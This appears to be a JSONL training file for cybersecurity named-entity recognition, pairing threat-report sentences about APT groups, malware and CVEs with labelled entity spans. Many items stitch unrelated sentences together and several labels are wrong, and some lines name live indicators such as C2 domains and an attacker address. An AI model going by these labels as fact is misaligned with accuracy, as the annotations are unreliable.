{"text": "EventBot is under active development and is evolving rapidly ; new versions are released every few days with improvements and new capabilities . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups . iDefense assesses with high confidence that this campaign is associated with the threat group DRAGONFISH ( also known as Lotus Blossom and Spring Dragon ) .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: document malware": [[171, 187]], "ORGANIZATION: Tibetan non-governmental organizations": [[207, 245]], "ORGANIZATION: Falun Gong": [[274, 284]], "ORGANIZATION: Uyghur groups": [[289, 302]], "ORGANIZATION: iDefense": [[305, 313]], "THREAT_ACTOR: DRAGONFISH": [[399, 409]], "THREAT_ACTOR: Lotus Blossom": [[426, 439]], "THREAT_ACTOR: Spring Dragon": [[444, 457]]}, "info": {"id": "cyberner_stix_train_002354", "source": "cyberner_stix_train"}}
{"text": "Communication with the C & C In order to communicate with its C & C , the app uses the MQTT ( Message Queuing Telemetry Transport ) protocol , which is transported over TCP port 1883 . However , over the past few years , we have been tracking a separate , less widely known suspected Iranian group with potential destructive capabilities , whom we call APT33 . The attackers were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage . Once the malware is dropped and executed through the lure documents , the Foudre backdoor connects to the HTTP commandandcontrol C2 server and downloads a selfextracting archive with fullfeatured Tonnerre malware .", "spans": {"THREAT_ACTOR: group": [[292, 297]], "THREAT_ACTOR: APT33": [[353, 358]], "MALWARE: Remexi": [[409, 415]], "MALWARE: malware": [[496, 503]], "MALWARE: Foudre backdoor": [[561, 576]], "SYSTEM: the HTTP commandandcontrol C2 server": [[589, 625]], "MALWARE: fullfeatured Tonnerre malware": [[670, 699]]}, "info": {"id": "cyberner_stix_train_002355", "source": "cyberner_stix_train"}}
{"text": "To spread through the hospitality company ’s network , APT28 used a version of the EternalBlue SMB exploit .", "spans": {"THREAT_ACTOR: APT28": [[55, 60]], "VULNERABILITY: EternalBlue": [[83, 94]]}, "info": {"id": "cyberner_stix_train_002356", "source": "cyberner_stix_train"}}
{"text": "AutoFocus customers can track these samples with the Zebrocy and Cannon WildFire detects the delivery documents , Zebrocy and Cannon payloads discussed in this blog with malicious verdicts .", "spans": {"ORGANIZATION: AutoFocus": [[0, 9]], "MALWARE: Zebrocy": [[53, 60], [114, 121]], "MALWARE: Cannon": [[65, 71], [126, 132]], "ORGANIZATION: WildFire": [[72, 80]]}, "info": {"id": "cyberner_stix_train_002357", "source": "cyberner_stix_train"}}
{"text": "Scarlet Mimic has carried out attacks using both spear-phishing and watering holes since at least 2009 with increasingly advanced malware , and has deployed malware to attack multiple operating systems and platforms . In the case of this malware , the activity groups strongly associated with Winnti are BARIUM and LEAD .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[0, 13]], "MALWARE: Winnti": [[293, 299]], "MALWARE: BARIUM": [[304, 310]], "MALWARE: LEAD": [[315, 319]]}, "info": {"id": "cyberner_stix_train_002358", "source": "cyberner_stix_train"}}
{"text": "Some of the icons used can be seen below . According to reports , the Philippines is the most exposed country in ASEAN to the cyberattacks known as advanced persistent threats , or APTs . FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran , use of Iranian infrastructure , and targeting that aligns with nation-state interests .", "spans": {"THREAT_ACTOR: cyberattacks": [[126, 138]], "ORGANIZATION: FireEye": [[188, 195]], "ORGANIZATION: Iranian government": [[243, 261]]}, "info": {"id": "cyberner_stix_train_002359", "source": "cyberner_stix_train"}}
{"text": "Most recently these included PDF attachments with embedded Microsoft Word documents bearing malicious macros that call PowerShell commands that install Dridex .", "spans": {"TOOL: PDF": [[29, 32]], "ORGANIZATION: Microsoft": [[59, 68]], "TOOL: Word": [[69, 73]], "TOOL: macros": [[102, 108]], "TOOL: PowerShell": [[119, 129]], "MALWARE: Dridex": [[152, 158]]}, "info": {"id": "cyberner_stix_train_002360", "source": "cyberner_stix_train"}}
{"text": "Strings ( c2 domains and functionality , error messages , etc ) are custom encrypted per deployment .", "spans": {"TOOL: c2": [[10, 12]]}, "info": {"id": "cyberner_stix_train_002361", "source": "cyberner_stix_train"}}
{"text": "The first anti-sandbox technique is the loader checking the code segment . To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys . Winnti : T1022 Data Encrypted . Another finding in the activity of ' Sharpshooter ' were a set of unobfuscated connections from IP addresses in Windhoek , a city in Namibia , Africa .", "spans": {"MALWARE: c:\\temp\\rr.exe": [[129, 143]], "THREAT_ACTOR: Winnti": [[234, 240]]}, "info": {"id": "cyberner_stix_train_002362", "source": "cyberner_stix_train"}}
{"text": "But devices sold outside of Amazon \" might not have ever seen fixes , '' he says . However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit (CVE-2018-0798) . C2 : lywja.healthsvsolu.com .", "spans": {"ORGANIZATION: Amazon": [[28, 34]], "ORGANIZATION: we": [[121, 123]], "MALWARE: AsyncRAT": [[187, 195]], "TOOL: C2": [[269, 271]], "DOMAIN: lywja.healthsvsolu.com": [[274, 296]]}, "info": {"id": "cyberner_stix_train_002363", "source": "cyberner_stix_train"}}
{"text": "It is not common to use this program to distribute malware , although there have been past cases where malware authors have done so . If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": {"TOOL: DoublePulsar backdoor": [[141, 162]], "TOOL: SMB worm": [[189, 197]], "VULNERABILITY: Eternalblue SMBv1 exploit": [[242, 267]], "ORGANIZATION: Trend Micro": [[284, 295]], "MALWARE: W2KM_DLOADR.UHAOEEN": [[329, 348]]}, "info": {"id": "cyberner_stix_train_002364", "source": "cyberner_stix_train"}}
{"text": "Alternatively , OurMine might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simple requested that a password reset link be sent to a compromised email address . However , some phishing emails were sent to bank employees in more than 25 countries of Central and Western Europe , Africa and Asia including : Kyrgyzstan , Armenia , Georgia , Serbia , Germany , Latvia , Czech Republic , Romania , Kenya , Israel , Cyprus , Greece , Turkey , Taiwan , Malaysia , Switzerland , Vietnam , Austria , Uzbekistan , Great Britain , Hong Kong , and others .", "spans": {"ORGANIZATION: WikiLeaks": [[68, 77]], "ORGANIZATION: DNS provider": [[81, 93]], "TOOL: emails": [[242, 248]], "ORGANIZATION: bank employees": [[262, 276]]}, "info": {"id": "cyberner_stix_train_002365", "source": "cyberner_stix_train"}}
{"text": "Pivoting off of this artifact provided us additional Zebrocy samples .", "spans": {"MALWARE: Zebrocy": [[53, 60]]}, "info": {"id": "cyberner_stix_train_002366", "source": "cyberner_stix_train"}}
{"text": "As MainService is the main controller , the developer has taken the appropriate actions to keep it functional and running at all times . Buckeye's use of Equation Group tools also involved the exploit of a previously unknown Windows zero-day vulnerability . An expansion into Linux tooling indicates iteration outside of their traditional comfort zone .", "spans": {"THREAT_ACTOR: Buckeye's": [[137, 146]], "SYSTEM: Linux": [[276, 281]]}, "info": {"id": "cyberner_stix_train_002367", "source": "cyberner_stix_train"}}
{"text": "APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . The witnessed techniques , tactics and procedures ( TTPs ) are in-line with what we usuallysee in Turla 's operation : a first stage backdoor , such as Skipper , likely delivered through spearphishing followed by the appearance on the compromised system of a second stage backdoor , Gazerin this case .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]], "VULNERABILITY: Flash exploits": [[49, 63]], "TOOL: Carberp": [[81, 88]], "TOOL: JHUHUGIT downloaders": [[95, 115]], "THREAT_ACTOR: Turla 's operation": [[246, 264]], "MALWARE: Skipper": [[300, 307]]}, "info": {"id": "cyberner_stix_train_002368", "source": "cyberner_stix_train"}}
{"text": "] com webmail [ . For example , we have observed frequent reuse of older ( patched ) exploits in malware operations against the Tibetan community . But , larger , more successful threat actors tend to evolve at a slower rate . This shorcut uses the WebDav HTTP protocol extension to retrieve the file launcher-upd.hta from a remote server : This heavily obfuscated script is responsible for the execution of PowerShell that downloads the final malware payload ( NetSupport RAT ) .", "spans": {"ORGANIZATION: Tibetan community": [[128, 145]], "SYSTEM: a remote server": [[323, 338]], "MALWARE: NetSupport RAT": [[462, 476]]}, "info": {"id": "cyberner_stix_train_002369", "source": "cyberner_stix_train"}}
{"text": "Below are descriptions of some of the most interesting . AA triggered an alert at a large telecoms operator in Southeast Asia . As usual , all the module timestamps are spread over a short time range , which could suggest the use of a build framework to compile these modules . Currently , Mandiant has observed the deployment of Atera , AnyDesk , and SplashTop to establish and maintain a foothold following exploitation of CVE-2023 - 4966 .", "spans": {"ORGANIZATION: telecoms operator": [[90, 107]], "ORGANIZATION: Mandiant": [[290, 298]], "TOOL: Atera": [[330, 335]], "TOOL: AnyDesk": [[338, 345]], "TOOL: SplashTop": [[352, 361]], "VULNERABILITY: CVE-2023 - 4966": [[425, 440]]}, "info": {"id": "cyberner_stix_train_002370", "source": "cyberner_stix_train"}}
{"text": "In its analysis , CSIS notes that MazarBOT was reported by Recorded Future last November as being actively sold in Russian underground forums and intriguingly , the malware will not activate on Android devices configured with Russian language settings . Its activity subsequently increased in the second quarter of 2018 , with a particular spike in April 2018 . Other additional modifications were made to the code ( e.g , writing a new algorithm for finding control flow dispatcher and first block , In the past , we have seen such occurrences with Magecart threat actors for example in the breach of the Umbro website .", "spans": {"ORGANIZATION: CSIS": [[18, 22]], "MALWARE: MazarBOT": [[34, 42]], "ORGANIZATION: Recorded Future": [[59, 74]], "SYSTEM: Android": [[194, 201]], "THREAT_ACTOR: Magecart threat actors": [[550, 572]], "ORGANIZATION: Umbro website": [[606, 619]]}, "info": {"id": "cyberner_stix_train_002371", "source": "cyberner_stix_train"}}
{"text": "CrowdStrike® Falcon® Intelligence™ also observed a strong correlation between Dridex infections and BitPaymer ransomware . Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it .", "spans": {"ORGANIZATION: CrowdStrike® Falcon® Intelligence™": [[0, 34]], "TOOL: Dridex": [[78, 84]], "TOOL: BitPaymer ransomware": [[100, 120]]}, "info": {"id": "cyberner_stix_train_002372", "source": "cyberner_stix_train"}}
{"text": "The reasons for this are unknown , but , we could suggest that they did not want to utilize any exploits to ensure they remained viable for any other operations .", "spans": {}, "info": {"id": "cyberner_stix_train_002373", "source": "cyberner_stix_train"}}
{"text": "Depending on the settings read from the configuration file , the scope may be narrowed to files with particular extensions and/or files created after a specified date .", "spans": {}, "info": {"id": "cyberner_stix_train_002374", "source": "cyberner_stix_train"}}
{"text": "To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer . Finally , some of the victims are also infected with other Turla-related malware such as ComRAT or Gazer .", "spans": {"VULNERABILITY: Carbanak": [[71, 79]], "TOOL: Ammy Admin": [[174, 184]], "TOOL: Team Viewer": [[189, 200]], "THREAT_ACTOR: Turla-related": [[262, 275]], "MALWARE: malware": [[276, 283]], "MALWARE: ComRAT": [[292, 298]], "MALWARE: Gazer": [[302, 307]]}, "info": {"id": "cyberner_stix_train_002375", "source": "cyberner_stix_train"}}
{"text": "Symantec monitors for this type of activity to help prevent organizations from being tied to malicious actions undertaken with their stolen certificates .", "spans": {"ORGANIZATION: Symantec": [[0, 8]]}, "info": {"id": "cyberner_stix_train_002376", "source": "cyberner_stix_train"}}
{"text": "The compilation timestamp therefore had to have been faked .", "spans": {}, "info": {"id": "cyberner_stix_train_002377", "source": "cyberner_stix_train"}}
{"text": "Falcon Intelligence has had unique insight into the email dialogue between a victim and an INDRIK SPIDER operator . The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": {"ORGANIZATION: Falcon Intelligence": [[0, 19]], "VULNERABILITY: exploit": [[170, 177]], "VULNERABILITY: CVE-2016-4117": [[184, 197]]}, "info": {"id": "cyberner_stix_train_002378", "source": "cyberner_stix_train"}}
{"text": "The second file , happiness.txt , contains custom code in binary format that is encrypted and used by xxxx.exe .", "spans": {"FILEPATH: happiness.txt": [[18, 31]], "FILEPATH: xxxx.exe": [[102, 110]]}, "info": {"id": "cyberner_stix_train_002379", "source": "cyberner_stix_train"}}
{"text": "The information given dates back to 2011 and nothing else has been published since . FireEye believes that two actors – Turla and an unknown financially motivated actor – were using the first EPS zero-day CVE-2017-0261 , and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege (EOP) zero-day CVE-2017-0263 .", "spans": {"ORGANIZATION: FireEye": [[85, 92]], "THREAT_ACTOR: actors": [[111, 117]], "THREAT_ACTOR: Turla": [[120, 125]], "ORGANIZATION: financially": [[141, 152]], "VULNERABILITY: zero-day": [[196, 204], [256, 264], [326, 334]], "VULNERABILITY: CVE-2017-0261": [[205, 218]], "THREAT_ACTOR: APT28": [[225, 230]], "VULNERABILITY: CVE-2017-0262": [[265, 278]], "VULNERABILITY: CVE-2017-0263": [[335, 348]]}, "info": {"id": "cyberner_stix_train_002380", "source": "cyberner_stix_train"}}
{"text": "The PLATINUM tool is , to our knowledge , the first malware sample observed to misuse chipset features in this way . The attacks were traced back to a computer system that was a virtual private server ( VPS ) located in the United States .", "spans": {"TOOL: PLATINUM tool": [[4, 17]], "TOOL: malware": [[52, 59]], "TOOL: VPS": [[203, 206]]}, "info": {"id": "cyberner_stix_train_002381", "source": "cyberner_stix_train"}}
{"text": "This is a PowerShell script that downloads and runs the ZeroT payload cgi.exe .", "spans": {"TOOL: PowerShell": [[10, 20]], "MALWARE: ZeroT": [[56, 61]], "FILEPATH: cgi.exe": [[70, 77]]}, "info": {"id": "cyberner_stix_train_002382", "source": "cyberner_stix_train"}}
{"text": "PLATINUM often spear phishes its targets at their non-official or private email accounts , to use as a stepping stone into the intended organization 's network . Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "ORGANIZATION: Unit 42": [[162, 169]], "MALWARE: NetTraveler": [[193, 204]], "VULNERABILITY: exploit": [[218, 225]], "VULNERABILITY: CVE-2012-0158": [[226, 239]], "MALWARE: NetTraveler Trojan": [[251, 269]]}, "info": {"id": "cyberner_stix_train_002383", "source": "cyberner_stix_train"}}
{"text": "Stealing and Concealing SMS Messages As some banks still use SMS-based transaction authorization , TrickMo is configured to automatically steal all SMS messages that are stored on the device . Like many such groups , PLATINUM seeks to steal sensitive intellectual property related to government interests , but its range of preferred targets is consistently limited to specific governmental organizations , defense institutes , intelligence agencies , diplomatic institutions , and telecommunication providers in South and Southeast Asia . During the past month , Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware , which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications .", "spans": {"MALWARE: TrickMo": [[99, 106]], "THREAT_ACTOR: groups": [[208, 214]], "THREAT_ACTOR: PLATINUM": [[217, 225]], "ORGANIZATION: government": [[284, 294], [622, 632]], "ORGANIZATION: governmental organizations": [[378, 404]], "ORGANIZATION: defense institutes": [[407, 425]], "ORGANIZATION: intelligence agencies": [[428, 449]], "ORGANIZATION: diplomatic institutions": [[452, 475]], "ORGANIZATION: telecommunication providers": [[482, 509]], "ORGANIZATION: Unit 42": [[564, 571]], "MALWARE: BONDUPDATER": [[670, 681]], "MALWARE: malware": [[682, 689]], "MALWARE: DNS tunneling": [[753, 766]], "TOOL: C2": [[784, 786]]}, "info": {"id": "cyberner_stix_train_002384", "source": "cyberner_stix_train"}}
{"text": "If the targeted device is not vulnerable to these exploits , then the app attempts to use a superuser binary pre-positioned at /system/csk to elevate privileges . The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period . A semicolon-separated list of executable filenames . COSMICENERGY is the latest example of specialized OT malware capable of causing cyber physical impacts , which are rarely discovered or disclosed .", "spans": {"THREAT_ACTOR: Leviathan": [[167, 176]], "MALWARE: macro-laden Microsoft Word documents": [[200, 236]], "ORGANIZATION: development organizations": [[269, 294]], "MALWARE: COSMICENERGY": [[369, 381]], "MALWARE: specialized OT malware": [[407, 429]]}, "info": {"id": "cyberner_stix_train_002385", "source": "cyberner_stix_train"}}
{"text": "The same event interception is used to place the webview overlay when the user tries to access the targeted applications , allowing it to display its overlay , thus intercepting the credentials . In addition to DustySky , the attackers use publicly available tools such as the following Remote Administration Tools ( RAT ) : Poison Ivy , Nano Core , XtremeRAT , DarkComet and Spy-Net . In addition , we discovered the group using Derusbi , which is a malware family believed to be unique to a small subset of Chinese cyber espionage groups . A month later , GReAT discovered two more previously unknown infection mechanisms for MiniDuke , which relied on Java and Internet Explorer vulnerabilities to infect the victim ’s PC .", "spans": {"TOOL: DustySky": [[211, 219]], "THREAT_ACTOR: attackers": [[226, 235]], "TOOL: publicly available tools": [[240, 264]], "TOOL: Remote Administration Tools": [[287, 314]], "TOOL: RAT": [[317, 320]], "TOOL: Poison Ivy": [[325, 335]], "TOOL: Nano Core": [[338, 347]], "TOOL: XtremeRAT": [[350, 359]], "TOOL: DarkComet": [[362, 371]], "TOOL: Spy-Net": [[376, 383]], "MALWARE: Derusbi": [[430, 437]], "ORGANIZATION: GReAT": [[558, 563]], "MALWARE: MiniDuke": [[628, 636]], "VULNERABILITY: Java and Internet Explorer vulnerabilities": [[655, 697]]}, "info": {"id": "cyberner_stix_train_002386", "source": "cyberner_stix_train"}}
{"text": "After we blocked those samples , they moved a significant portion of malicious functionality into the native library , which resulted in a rather peculiar back and forth between Dalvik and native code : COMMAND & CONTROL Dynamic Shortcodes & Content Early versions of Bread utilized a basic command and control infrastructure to dynamically deliver content and retrieve billing details . Our initial observation of the Bahamut group originated from in-the-wild attempts to deceive targets into providing account passwords through impersonation of platform providers . It adds the SeLoadDriver privilege to its access token and proceeds to install the driver as a fake disk filter driver . In its spear phish , CloudLook also used a self - extracting archive containing a PDF file that lured its victims with information regarding world terrorism .", "spans": {"ORGANIZATION: platform providers": [[547, 565]], "TOOL: SeLoadDriver": [[580, 592]], "MALWARE: CloudLook": [[710, 719]]}, "info": {"id": "cyberner_stix_train_002387", "source": "cyberner_stix_train"}}
{"text": "This reconnaissance malware has been used by Group 74 for years and it is composed of 2 files : a dropper and a payload .", "spans": {"THREAT_ACTOR: Group 74": [[45, 53]]}, "info": {"id": "cyberner_stix_train_002388", "source": "cyberner_stix_train"}}
{"text": "Since at least 2007 , APT28 has engaged in extensive operations in support of Russian strategic interests .", "spans": {"THREAT_ACTOR: APT28": [[22, 27]]}, "info": {"id": "cyberner_stix_train_002389", "source": "cyberner_stix_train"}}
{"text": "Researching the domain go-microstf.com , hosted at 45.63.10.99 , revealed yet another iteration of malicious executables .", "spans": {"DOMAIN: go-microstf.com": [[23, 38]], "IP_ADDRESS: 45.63.10.99": [[51, 62]]}, "info": {"id": "cyberner_stix_train_002390", "source": "cyberner_stix_train"}}
{"text": "This backdoor first emerged in January 2019 and has been continuously active since then .", "spans": {}, "info": {"id": "cyberner_stix_train_002391", "source": "cyberner_stix_train"}}
{"text": "In this context , there is indeed no need to execute the stage 4 malware . The campaigns delivered PupyRAT , an open-source cross-platform remote access trojan ( RAT ) . The main differences are : The social media platform says it tied the groups malware samples to a specific Iranianbased IT contractor called Mahak Rayan Afraz , which has previously provided malware to the IRGC , indicating a link between the Tortoiseshell group and the Iranian government .", "spans": {"TOOL: PupyRAT": [[99, 106]], "TOOL: remote access trojan": [[139, 159]], "TOOL: RAT": [[162, 165]], "ORGANIZATION: social media platform": [[201, 222]], "THREAT_ACTOR: Mahak Rayan Afraz": [[311, 328]], "MALWARE: malware": [[361, 368]], "THREAT_ACTOR: IRGC": [[376, 380]], "THREAT_ACTOR: Tortoiseshell": [[413, 426]], "THREAT_ACTOR: Iranian government": [[441, 459]]}, "info": {"id": "cyberner_stix_train_002392", "source": "cyberner_stix_train"}}
{"text": "The RC4 key is hardcoded in EventBot . Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan (Backdoor.Filensfer) . The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method , specifically attempting to load MagicHound.Rollover .", "spans": {"MALWARE: EventBot": [[28, 36]], "MALWARE: Bemstour": [[67, 75]], "MALWARE: Pirpi": [[106, 111]], "MALWARE: backdoor": [[112, 120]], "TOOL: different": [[180, 189]], "TOOL: backdoor": [[190, 198]], "MALWARE: MagicHound.Rollover": [[367, 386]]}, "info": {"id": "cyberner_stix_train_002393", "source": "cyberner_stix_train"}}
{"text": "Falcon Intelligence has observed MYTHIC LEOPARD using this technique for several years to install multiple first-stage implants and downloaders , including the isqlmanager and Waizsar RAT malware families . PLATINUM has used several zero-day exploits against their victims .", "spans": {"ORGANIZATION: Falcon Intelligence": [[0, 19]], "THREAT_ACTOR: MYTHIC LEOPARD": [[33, 47]], "TOOL: isqlmanager": [[160, 171]], "TOOL: Waizsar RAT malware families": [[176, 204]], "THREAT_ACTOR: PLATINUM": [[207, 215]], "VULNERABILITY: zero-day": [[233, 241]]}, "info": {"id": "cyberner_stix_train_002394", "source": "cyberner_stix_train"}}
{"text": "If the value does not match , the app skips the “ disclosure ” page and billing process and brings the user straight to the app content . In the 2017 ShadowPad attack , the update mechanism for Korean server management software provider NetSarang was compromised to serve up an eponymous backdoor . ObReferenceObjectByHandle is a Kernel routine designed to validate a target object and return the pointer to its object body ( and even its handle information ) , starting from the object handle ( even the user-mode one ) . An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": {"ORGANIZATION: server management software provider": [[201, 236]]}, "info": {"id": "cyberner_stix_train_002395", "source": "cyberner_stix_train"}}
{"text": "The dates on the “ x ” axis show the dates when we first saw these apps in the wild . Recent investigations by FireEye 's Mandiant incident response consultants combined with FireEye iSIGHT Threat Intelligence analysis have given us a more complete picture of a suspected Iranian threat group , that we believe has been operating since at least 2014 . The more recent document is from mid-January and alleged to be from a United Arab Emirate organization . Babuk , a Russian ransomware group that emerged in 2021 , has conducted a series of high - profile ransomware attacks across various industries , including government , healthcare , logistics , and professional services .", "spans": {"ORGANIZATION: FireEye 's Mandiant": [[111, 130]], "ORGANIZATION: FireEye iSIGHT Threat Intelligence": [[175, 209]], "THREAT_ACTOR: threat group": [[280, 292]], "ORGANIZATION: industries": [[590, 600]], "ORGANIZATION: government": [[613, 623]], "ORGANIZATION: healthcare": [[626, 636]], "ORGANIZATION: logistics": [[639, 648]], "ORGANIZATION: professional services": [[655, 676]]}, "info": {"id": "cyberner_stix_train_002396", "source": "cyberner_stix_train"}}
{"text": "The Sofacy group uses such tools as well .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]]}, "info": {"id": "cyberner_stix_train_002397", "source": "cyberner_stix_train"}}
{"text": "Rather than being written to disk as individual script files , the PowerShell payloads were stored in the registry .", "spans": {"TOOL: PowerShell payloads": [[67, 86]], "TOOL: registry": [[106, 114]]}, "info": {"id": "cyberner_stix_train_002398", "source": "cyberner_stix_train"}}
{"text": "In the past , XLoader showed the ability to mine cryptocurrency on PCs and perform account phishing on iOS devices . FireEye analysts documented the admin@338 group 's activities in a previous paper titled Poison Ivy : Assessing Damage and Extracting Intelligence paper . Our first post about analyzing malware with DNS tunneling capabilities focuses on how the PoisonFrog malware uses DNS tunneling to send and receive victim information and commands . If this is a potential threat vector for the organization , dual controls need to be put in place .", "spans": {"MALWARE: XLoader": [[14, 21]], "SYSTEM: iOS": [[103, 106]], "ORGANIZATION: FireEye": [[117, 124]], "THREAT_ACTOR: admin@338 group": [[149, 164]], "TOOL: Poison Ivy": [[206, 216]], "MALWARE: PoisonFrog": [[362, 372]]}, "info": {"id": "cyberner_stix_train_002399", "source": "cyberner_stix_train"}}
{"text": "The output in Figure 3 shows the Process ID ( PID ) of the csrss.exe process to be 716 .", "spans": {"TOOL: Process ID": [[33, 43]], "TOOL: PID": [[46, 49]], "FILEPATH: csrss.exe": [[59, 68]]}, "info": {"id": "cyberner_stix_train_002400", "source": "cyberner_stix_train"}}
{"text": "COZY BEAR ( also referred to in some industry reports as CozyDuke or APT 29 ) is the adversary group that last year successfully infiltrated the unclassified networks of the White House , State Department , and US Joint Chiefs of Staff .", "spans": {"THREAT_ACTOR: COZY BEAR": [[0, 9]], "THREAT_ACTOR: CozyDuke": [[57, 65]], "THREAT_ACTOR: APT 29": [[69, 75]], "ORGANIZATION: White House": [[174, 185]], "ORGANIZATION: State Department": [[188, 204]], "ORGANIZATION: Joint Chiefs of Staff": [[214, 235]]}, "info": {"id": "cyberner_stix_train_002401", "source": "cyberner_stix_train"}}
{"text": "The desktop components of this attack , previously discovered by Palo Alto Network , are known as KasperAgent and Micropsia . Attackers went on to use the Trojan to steal $4 million from 24 banks , including 22 in the United States and two in Canada , in just two weeks . However , the first compile time35 we have for WEBC2 is 2004-01-23 , suggesting that APT1 has been crafting WEBC2 backdoors since early 2004 . The samples we have observed seemed not to be malware targeted for the game fans but a malware module which accidentally got into [ the ] wrong place .", "spans": {"ORGANIZATION: Palo Alto Network": [[65, 82]], "MALWARE: KasperAgent": [[98, 109]], "MALWARE: Micropsia": [[114, 123]], "ORGANIZATION: banks": [[190, 195]], "MALWARE: WEBC2": [[319, 324]], "THREAT_ACTOR: APT1": [[357, 361]], "MALWARE: WEBC2 backdoors": [[380, 395]], "MALWARE: malware": [[461, 468]], "ORGANIZATION: the game fans": [[482, 495]], "MALWARE: a malware module": [[500, 516]]}, "info": {"id": "cyberner_stix_train_002402", "source": "cyberner_stix_train"}}
{"text": "Backdoor.SofacyX ( also known as X-Agent ) is a second stage piece of malware , capable of stealing information from the infected computer .", "spans": {"FILEPATH: Backdoor.SofacyX": [[0, 16]], "MALWARE: X-Agent": [[33, 40]]}, "info": {"id": "cyberner_stix_train_002403", "source": "cyberner_stix_train"}}
{"text": "Although Downeks has been publicly examined to some extent , our analysis found several features not previously described .", "spans": {"MALWARE: Downeks": [[9, 16]]}, "info": {"id": "cyberner_stix_train_002404", "source": "cyberner_stix_train"}}
{"text": "JUNE AND SEPTEMBER 2014 , APT28 employed “ Sedkit ” in conjunction with strategic web compromises to deliver “ Sofacy ” malware on Polish Government websites , and the websites of Polish energy company Power Exchange .", "spans": {"THREAT_ACTOR: APT28": [[26, 31]], "MALWARE: Sedkit": [[43, 49]], "MALWARE: Sofacy": [[111, 117]]}, "info": {"id": "cyberner_stix_train_002405", "source": "cyberner_stix_train"}}
{"text": "The threat actors work to overcome existing security controls , or those put in place during an engagement , to complete their mission of exfiltrating intellectual property .", "spans": {}, "info": {"id": "cyberner_stix_train_002406", "source": "cyberner_stix_train"}}
{"text": "Cannon acknowledges the receipt of file path by sending an email to sahro.bella7@post.cz with s.txt ( contains {SysPar = 65} string ) as the attachment , ok3 within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": {"MALWARE: Cannon": [[0, 6]], "TOOL: email": [[59, 64]], "EMAIL: sahro.bella7@post.cz": [[68, 88]], "FILEPATH: s.txt": [[94, 99]]}, "info": {"id": "cyberner_stix_train_002407", "source": "cyberner_stix_train"}}
{"text": "The target is encouraged to download an archive file in a rar or zip format that contains an executable file masquerading as a Microsoft Word document .", "spans": {"TOOL: rar": [[58, 61]], "TOOL: zip": [[65, 68]], "ORGANIZATION: Microsoft": [[127, 136]], "TOOL: Word": [[137, 141]]}, "info": {"id": "cyberner_stix_train_002408", "source": "cyberner_stix_train"}}
{"text": "FireEye Labs recently identified a previously unobserved version of Ploutus , dubbed Ploutus-D , that interacts with KAL’s Kalignite multivendor ATM platform . Figure 9a , below , shows detections of encounters with the Barium actors and their infrastructure , including infected computers located in Virginia , and Figure 9b , below , shows detections of encounters throughout the United States .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "MALWARE: Ploutus": [[68, 75]], "MALWARE: Ploutus-D": [[85, 94]], "THREAT_ACTOR: Barium": [[220, 226]]}, "info": {"id": "cyberner_stix_train_002409", "source": "cyberner_stix_train"}}
{"text": "This will be the trigger for the service to start the beaconing . In September 2018 , we found evidence of Seedworm and the espionage group APT28 ( aka Swallowtail , Fancy Bear ) , on a computer within the Brazil-based embassy of an oil-producing nation . DDKONG Plugin : SHA256 : 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 . There is high turnover of staff , especially in entrylevel positions , which makes it difficult to ensure all staff have cybersecurity training .", "spans": {"THREAT_ACTOR: Seedworm": [[107, 115]], "THREAT_ACTOR: espionage group": [[124, 139]], "THREAT_ACTOR: APT28": [[140, 145]], "THREAT_ACTOR: Swallowtail": [[152, 163]], "THREAT_ACTOR: Fancy Bear": [[166, 176]], "ORGANIZATION: embassy": [[219, 226]], "MALWARE: DDKONG": [[256, 262]], "FILEPATH: 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707": [[281, 345]], "VULNERABILITY: high turnover of staff": [[357, 379]], "VULNERABILITY: difficult to ensure all staff have cybersecurity training": [[434, 491]]}, "info": {"id": "cyberner_stix_train_002410", "source": "cyberner_stix_train"}}
{"text": "While it ’s possible that this is a coincidence , the rest of the evidence makes it unlikely for these two malware to target the same organizations by chance .", "spans": {"MALWARE: malware": [[107, 114]]}, "info": {"id": "cyberner_stix_train_002412", "source": "cyberner_stix_train"}}
